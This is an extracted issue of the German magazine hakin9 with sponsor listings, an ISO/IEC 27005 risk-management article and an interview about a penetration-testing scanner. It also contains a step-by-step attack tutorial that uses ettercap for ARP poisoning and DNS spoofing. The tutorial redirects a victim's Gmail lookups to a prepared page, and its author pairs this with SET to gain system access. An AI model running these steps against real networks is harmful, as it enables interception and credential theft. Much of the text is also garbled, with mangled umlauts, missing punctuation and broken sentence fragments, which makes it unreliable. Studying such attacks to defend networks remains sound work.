Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
